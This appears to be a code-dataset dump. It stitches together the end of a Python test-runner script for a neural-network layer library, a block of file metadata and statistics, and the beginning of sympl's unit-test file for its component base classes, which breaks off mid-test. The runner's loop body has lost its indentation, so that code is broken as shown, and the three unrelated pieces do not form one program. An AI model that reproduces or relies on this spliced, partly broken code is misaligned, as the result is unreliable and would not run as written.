print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_batch_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_identity(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_fully_connected(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_dropout(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_flatten(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softmax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_thresholded_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_elu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_prelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_leaky_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_selu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softplus(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softsign(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_tanh(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_hard_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_concatenate(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_add(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_truncated_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_variance_scaling(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
| 35.143353
| 113
| 0.711372
| 3,782
| 30,399
| 5.372819
| 0.033845
| 0.160433
| 0.126772
| 0.07874
| 0.822441
| 0.764469
| 0.75876
| 0.75
| 0.75
| 0.75
| 0
| 0.005936
| 0.135531
| 30,399
| 865
| 114
| 35.143353
| 0.767305
| 0
| 0
| 0.729358
| 0
| 0
| 0.284441
| 0.001513
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.122324
| 0
| 0.122324
| 0.501529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
fa9c54781754c2560415d01606793ad6b5b43910
| 73,392
|
py
|
Python
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 46
|
2017-01-05T00:21:18.000Z
|
2022-03-05T12:20:39.000Z
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 47
|
2017-03-27T13:37:31.000Z
|
2022-02-02T07:14:22.000Z
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 11
|
2017-01-27T23:03:34.000Z
|
2020-06-22T20:05:49.000Z
|
import pytest
import mock
import numpy as np
import unittest
from sympl import (
TendencyComponent, DiagnosticComponent, Monitor, Stepper, ImplicitTendencyComponent,
datetime, timedelta, DataArray, InvalidPropertyDictError,
ComponentMissingOutputError, ComponentExtraOutputError,
InvalidStateError
)
def same_list(list1, list2):
return (len(list1) == len(list2) and all(
[item in list2 for item in list1] + [item in list1 for item in list2]))
class MockTendencyComponent(TendencyComponent):
input_properties = None
diagnostic_properties = None
tendency_properties = None
def __init__(
self, input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, **kwargs):
self.input_properties = input_properties
self.diagnostic_properties = diagnostic_properties
self.tendency_properties = tendency_properties
self.diagnostic_output = diagnostic_output
self.tendency_output = tendency_output
self.times_called = 0
self.state_given = None
super(MockTendencyComponent, self).__init__(**kwargs)
def array_call(self, state):
self.times_called += 1
self.state_given = state
return self.tendency_output, self.diagnostic_output
class MockImplicitTendencyComponent(ImplicitTendencyComponent):
input_properties = None
diagnostic_properties = None
tendency_properties = None
def __init__(
self, input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, **kwargs):
self.input_properties = input_properties
self.diagnostic_properties = diagnostic_properties
self.tendency_properties = tendency_properties
self.diagnostic_output = diagnostic_output
self.tendency_output = tendency_output
self.times_called = 0
self.state_given = None
self.timestep_given = None
super(MockImplicitTendencyComponent, self).__init__(**kwargs)
def array_call(self, state, timestep):
self.times_called += 1
self.state_given = state
self.timestep_given = timestep
return self.tendency_output, self.diagnostic_output
class MockDiagnosticComponent(DiagnosticComponent):
input_properties = None
diagnostic_properties = None
def __init__(
self, input_properties, diagnostic_properties, diagnostic_output,
**kwargs):
self.input_properties = input_properties
self.diagnostic_properties = diagnostic_properties
self.diagnostic_output = diagnostic_output
self.times_called = 0
self.state_given = None
super(MockDiagnosticComponent, self).__init__(**kwargs)
def array_call(self, state):
self.times_called += 1
self.state_given = state
return self.diagnostic_output
class MockStepper(Stepper):
input_properties = None
diagnostic_properties = None
output_properties = None
def __init__(
self, input_properties, diagnostic_properties, output_properties,
diagnostic_output, state_output,
**kwargs):
self.input_properties = input_properties
self.diagnostic_properties = diagnostic_properties
self.output_properties = output_properties
self.diagnostic_output = diagnostic_output
self.state_output = state_output
self.times_called = 0
self.state_given = None
self.timestep_given = None
super(MockStepper, self).__init__(**kwargs)
def array_call(self, state, timestep):
self.times_called += 1
self.state_given = state
self.timestep_given = timestep
return self.diagnostic_output, self.state_output
class MockMonitor(Monitor):
def store(self, state):
return
class BadMockTendencyComponent(TendencyComponent):
input_properties = {}
tendency_properties = {}
diagnostic_properties = {}
def __init__(self):
pass
def array_call(self, state):
return {}, {}
class BadMockImplicitTendencyComponent(ImplicitTendencyComponent):
input_properties = {}
tendency_properties = {}
diagnostic_properties = {}
def __init__(self):
pass
def array_call(self, state, timestep):
return {}, {}
class BadMockDiagnosticComponent(DiagnosticComponent):
input_properties = {}
diagnostic_properties = {}
def __init__(self):
pass
def array_call(self, state):
return {}
class BadMockStepper(Stepper):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
def __init__(self):
pass
def array_call(self, state, timestep):
return {}, {}
class InputTestBase():
def test_raises_on_input_properties_of_wrong_type(self):
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=({},))
def test_cannot_overlap_input_aliases(self):
input_properties = {
'input1': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'},
'input2': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'}
}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_raises_when_input_missing(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {'time': timedelta(0)}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_incorrect_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim1'],
attrs={'units': 's'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_incorrect_dims(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim2'],
attrs={'units': 'm'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_conflicting_dim_lengths(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
},
'input1': {
'dims': ['dim2'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim1'],
attrs={'units': 'm'},
),
'input2': DataArray(
np.zeros([7]),
dims=['dim1'],
attrs={'units': 'm'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_collects_independent_wildcard_dims(self):
input_properties = {
'input1': {
'dims': ['*'],
'units': 'm',
},
'input2': {
'dims': ['*'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([4]),
dims=['dim1'],
attrs={'units': 'm'},
),
'input2': DataArray(
np.zeros([3]),
dims=['dim2'],
attrs={'units': 'm'},
),
}
self.call_component(component, state)
given = component.state_given
assert len(given.keys()) == 3
assert 'time' in given.keys()
assert 'input1' in given.keys()
assert given['input1'].shape == (12,)
assert 'input2' in given.keys()
assert given['input2'].shape == (12,)
def test_accepts_when_input_swapped_dims(self):
input_properties = {
'input1': {
'dims': ['dim1', 'dim2'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([3, 4]),
dims=['dim2', 'dim1'],
attrs={'units': 'm'},
),
}
self.call_component(component, state)
assert component.state_given['input1'].shape == (4, 3)
def test_input_requires_dims(self):
input_properties = {'input1': {'units': 'm'}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_input_requires_units(self):
input_properties = {'input1': {'dims': ['dim1']}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_input_no_transformations(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10]))
def test_input_converts_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'km'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10])*1000.)
def test_input_converts_temperature_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'degK'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'degC'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10])*274.15)
def test_input_collects_one_dimension(self):
input_properties = {
'input1': {
'dims': ['*'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10]))
def test_input_is_aliased(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'in1',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'in1' in component.state_given.keys()
assert isinstance(component.state_given['in1'], np.ndarray)
assert np.all(component.state_given['in1'] == np.ones([10]))
class DiagnosticTestBase():
def test_raises_on_diagnostic_properties_of_wrong_type(self):
with self.assertRaises(InvalidPropertyDictError):
self.get_component(diagnostic_properties=({},))
def test_diagnostic_requires_dims(self):
diagnostic_properties = {'diag1': {'units': 'm'}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(diagnostic_properties=diagnostic_properties)
def test_diagnostic_requires_units(self):
diagnostic_properties = {'diag1': {'dims': ['dim1']}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(diagnostic_properties=diagnostic_properties)
def test_diagnostic_raises_when_units_incompatible_with_input(self):
input_properties = {
'diag1': {'units': 'km', 'dims': ['dim1', 'dim2']}
}
diagnostic_properties = {
'diag1': {'units': 'seconds', 'dims': ['dim1', 'dim2']}
}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties
)
def test_diagnostic_requires_correct_number_of_dims(self):
input_properties = {
'input1': {'units': 'm', 'dims': ['dim1', 'dim2']}
}
diagnostic_properties = {
'diag1': {'units': 'm', 'dims': ['dim1', 'dim2']}
}
diagnostic_output = {'diag1': np.zeros([10]),}
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10, 2]),
dims=['dim1', 'dim2'],
attrs={'units': 'm'}
)
}
component = self.get_component(
input_properties = input_properties,
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
with self.assertRaises(InvalidPropertyDictError):
_, _ = self.call_component(component, state)
def test_diagnostic_requires_correct_dim_length(self):
input_properties = {
'input1': {'units': 'm', 'dims': ['dim1', 'dim2']}
}
diagnostic_properties = {
'diag1': {'units': 'm', 'dims': ['dim1', 'dim2']}
}
diagnostic_output = {'diag1': np.zeros([5, 2]),}
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10, 2]),
dims=['dim1', 'dim2'],
attrs={'units': 'm'}
)
}
component = self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output
)
with self.assertRaises(InvalidPropertyDictError):
_, _ = self.call_component(component, state)
def test_diagnostic_uses_input_dims(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {'diag1': {'units': 'm'}}
self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties
)
def test_diagnostic_doesnt_use_input_units(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {'diag1': {'dims': ['dim1']}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties
)
def test_diagnostics_no_transformations(self):
diagnostic_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {
'output1': np.ones([10]),
}
component = self.get_component(
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
state = {'time': timedelta(0)}
diagnostics = self.get_diagnostics(self.call_component(component, state))
assert len(diagnostics) == 1
assert 'output1' in diagnostics.keys()
assert isinstance(diagnostics['output1'], DataArray)
assert len(diagnostics['output1'].dims) == 1
assert 'dim1' in diagnostics['output1'].dims
assert 'units' in diagnostics['output1'].attrs
assert len(diagnostics['output1'].attrs) == 1
assert diagnostics['output1'].attrs['units'] == 'm'
assert np.all(diagnostics['output1'].values == np.ones([10]))
def test_diagnostics_restoring_dims(self):
input_properties = {
'input1': {
'dims': ['*', 'dim1'],
'units': 'm',
}
}
diagnostic_properties = {
'output1': {
'dims': ['*', 'dim1'],
'units': 'm'
}
}
diagnostic_output = {
'output1': np.ones([1, 10]),
}
component = self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
state = {
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}),
'time': timedelta(0)}
diagnostics = self.get_diagnostics(self.call_component(component, state))
assert len(diagnostics) == 1
assert 'output1' in diagnostics.keys()
assert isinstance(diagnostics['output1'], DataArray)
assert len(diagnostics['output1'].dims) == 1
assert 'dim1' in diagnostics['output1'].dims
assert 'units' in diagnostics['output1'].attrs
assert diagnostics['output1'].attrs['units'] == 'm'
assert np.all(diagnostics['output1'].values == np.ones([10]))
def test_diagnostics_with_alias(self):
diagnostic_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'out1',
}
}
diagnostic_output = {
'out1': np.ones([10]),
}
component = self.get_component(
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
state = {'time': timedelta(0)}
diagnostics = self.get_diagnostics(self.call_component(component, state))
assert len(diagnostics) == 1
assert 'output1' in diagnostics.keys()
assert isinstance(diagnostics['output1'], DataArray)
assert len(diagnostics['output1'].dims) == 1
assert 'dim1' in diagnostics['output1'].dims
assert 'units' in diagnostics['output1'].attrs
assert diagnostics['output1'].attrs['units'] == 'm'
assert np.all(diagnostics['output1'].values == np.ones([10]))
def test_diagnostics_with_alias_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'out1',
}
}
diagnostic_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_output = {
'out1': np.ones([10]),
}
component = self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
diagnostics = self.get_diagnostics(self.call_component(component, state))
assert len(diagnostics) == 1
assert 'output1' in diagnostics.keys()
assert isinstance(diagnostics['output1'], DataArray)
assert len(diagnostics['output1'].dims) == 1
assert 'dim1' in diagnostics['output1'].dims
assert 'units' in diagnostics['output1'].attrs
assert diagnostics['output1'].attrs['units'] == 'm'
assert np.all(diagnostics['output1'].values == np.ones([10]))
def test_diagnostics_with_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {
'output1': {
'units': 'm',
}
}
diagnostic_output = {
'output1': np.ones([10]),
}
component = self.get_component(
input_properties=input_properties,
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output,
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
diagnostics = self.get_diagnostics(self.call_component(component, state))
assert len(diagnostics) == 1
assert 'output1' in diagnostics.keys()
assert isinstance(diagnostics['output1'], DataArray)
